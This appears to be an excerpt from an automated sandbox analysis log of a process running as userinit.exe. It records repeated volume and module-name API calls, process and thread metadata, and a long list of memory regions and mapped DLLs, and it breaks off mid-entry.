[0100.483] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.483] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e960, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.483] VirtualAlloc (lpAddress=0x2b10000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b10000
[0100.484] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.484] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.484] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.484] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.484] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.484] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.484] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.485] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.485] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.485] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.485] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.485] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.485] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.486] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.486] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.486] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.486] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.486] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.486] GetSystemDefaultLangID () returned 0x5e0409
[0100.486] VerLanguageNameA (in: wLang=0x409, szLang=0x22ea0c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0100.487] ExitProcess (uExitCode=0x0)
Thread:
id = 233
os_tid = 0xf8c
Thread:
id = 234
os_tid = 0xf90
Process:
id = "31"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be6e0"
os_pid = "0xf7c"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2805
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2806
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2807
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2808
start_va = 0xb0000
end_va = 0xeffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 2809
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2810
start_va = 0xe70000
end_va = 0xe78fff
entry_point = 0xe70000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 2811
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2812
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2813
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2814
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 2815
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2817
start_va = 0x270000
end_va = 0x36ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 2818
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2819
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2820
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2821
start_va = 0x60000
end_va = 0x6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 2822
start_va = 0xf0000
end_va = 0x156fff
entry_point = 0xf0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2823
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 2824
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2825
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2826
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2827
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2828
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2829
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2830
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2831
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2832
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2833
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2834
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2835
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2836
start_va = 0x160000
end_va = 0x227fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 2837
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2838
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2839
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2840
start_va = 0x50000
end_va = 0x50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2841
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 2842
start_va = 0x6c0000
end_va = 0x6cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 2843
start_va = 0xe80000
end_va = 0x1a7ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e80000"
filename = ""
Region:
id = 2844
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 2845
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2846
start_va = 0x6d0000
end_va = 0x85ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 2855
start_va = 0x6d0000
end_va = 0x7aefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 2856
start_va = 0x820000
end_va = 0x85ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000820000"
filename = ""
Region:
id = 2857
start_va = 0x70000
end_va = 0x70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2858
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2859
start_va = 0x860000
end_va = 0x91ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 2860
start_va = 0x1a80000
end_va = 0x23affff
entry_point = 0x1a80000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 2871
start_va = 0x80000
end_va = 0x86fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 2872
start_va = 0x90000
end_va = 0x91fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000090000"
filename = ""
Region:
id = 2873
start_va = 0x920000
end_va = 0xd12fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000920000"
filename = ""
Region:
id = 2874
start_va = 0x370000
end_va = 0x3effff
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 2875
start_va = 0xd20000
end_va = 0xe2cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d20000"
filename = ""
Region:
id = 2876
start_va = 0x23b0000
end_va = 0x24affff
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 2878
start_va = 0x24b0000
end_va = 0x26affff
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 2879
start_va = 0x26b0000
end_va = 0x2730fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2883
start_va = 0x2740000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 2884
start_va = 0x26b0000
end_va = 0x2734fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2885
start_va = 0x2740000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 2889
start_va = 0x26b0000
end_va = 0x2738fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2890
start_va = 0x2740000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 2891
start_va = 0x26b0000
end_va = 0x273cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2892
start_va = 0x2740000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 2897
start_va = 0x27d0000
end_va = 0x2860fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 2898
start_va = 0x26b0000
end_va = 0x2742fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2899
start_va = 0x2750000
end_va = 0x27e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 2900
start_va = 0x26b0000
end_va = 0x2746fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2904
start_va = 0x2750000
end_va = 0x27e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 2905
start_va = 0x26b0000
end_va = 0x274afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2906
start_va = 0x2750000
end_va = 0x27ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 2911
start_va = 0x26b0000
end_va = 0x274efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2912
start_va = 0x2750000
end_va = 0x27f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 2913
start_va = 0x2800000
end_va = 0x28a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2917
start_va = 0x26b0000
end_va = 0x2754fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2918
start_va = 0x2760000
end_va = 0x2806fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 2919
start_va = 0x26b0000
end_va = 0x2758fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2923
start_va = 0x2760000
end_va = 0x280afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 2924
start_va = 0x26b0000
end_va = 0x275cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2925
start_va = 0x2760000
end_va = 0x280efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 2926
start_va = 0x2810000
end_va = 0x28c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2930
start_va = 0x26b0000
end_va = 0x2762fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2931
start_va = 0x2770000
end_va = 0x2824fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 2935
start_va = 0x26b0000
end_va = 0x2766fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2936
start_va = 0x2770000
end_va = 0x2828fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 2937
start_va = 0x26b0000
end_va = 0x276afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2941
start_va = 0x2770000
end_va = 0x282cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 2942
start_va = 0x26b0000
end_va = 0x276efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2943
start_va = 0x2770000
end_va = 0x2830fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 2946
start_va = 0x2840000
end_va = 0x2902fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 2947
start_va = 0x26b0000
end_va = 0x2774fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2951
start_va = 0x2780000
end_va = 0x2846fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2952
start_va = 0x26b0000
end_va = 0x2778fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2953
start_va = 0x2780000
end_va = 0x284afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2956
start_va = 0x26b0000
end_va = 0x277cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2957
start_va = 0x2780000
end_va = 0x284efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2960
start_va = 0x2850000
end_va = 0x2920fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 2961
start_va = 0x26b0000
end_va = 0x2782fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2965
start_va = 0x2790000
end_va = 0x2864fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 2966
start_va = 0x26b0000
end_va = 0x2786fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2967
start_va = 0x2790000
end_va = 0x2868fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 2970
start_va = 0x26b0000
end_va = 0x278afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2971
start_va = 0x2790000
end_va = 0x286cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 2974
start_va = 0x26b0000
end_va = 0x278efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2975
start_va = 0x2790000
end_va = 0x2870fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 2978
start_va = 0x2880000
end_va = 0x2962fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 2981
start_va = 0x26b0000
end_va = 0x2794fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2982
start_va = 0x27a0000
end_va = 0x2886fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 2983
start_va = 0x26b0000
end_va = 0x2798fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2986
start_va = 0x27a0000
end_va = 0x288afff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 2987
start_va = 0x26b0000
end_va = 0x279cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2990
start_va = 0x27a0000
end_va = 0x288efff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 2991
start_va = 0x2890000
end_va = 0x2980fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 2994
start_va = 0x26b0000
end_va = 0x27a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2995
start_va = 0x27b0000
end_va = 0x28a4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 2998
start_va = 0x26b0000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2999
start_va = 0x27b0000
end_va = 0x28a8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 3003
start_va = 0x26b0000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 3004
start_va = 0x27b0000
end_va = 0x28acfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 3006
start_va = 0x26b0000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 3007
start_va = 0x27b0000
end_va = 0x28b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 3010
start_va = 0x28c0000
end_va = 0x29c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3011
start_va = 0x26b0000
end_va = 0x27b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 3014
start_va = 0x27c0000
end_va = 0x28c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3015
start_va = 0x26b0000
end_va = 0x27b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 3017
start_va = 0x27c0000
end_va = 0x28cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3018
start_va = 0x26b0000
end_va = 0x27bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 3021
start_va = 0x27c0000
end_va = 0x28cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3023
start_va = 0x28d0000
end_va = 0x29e2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3024
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
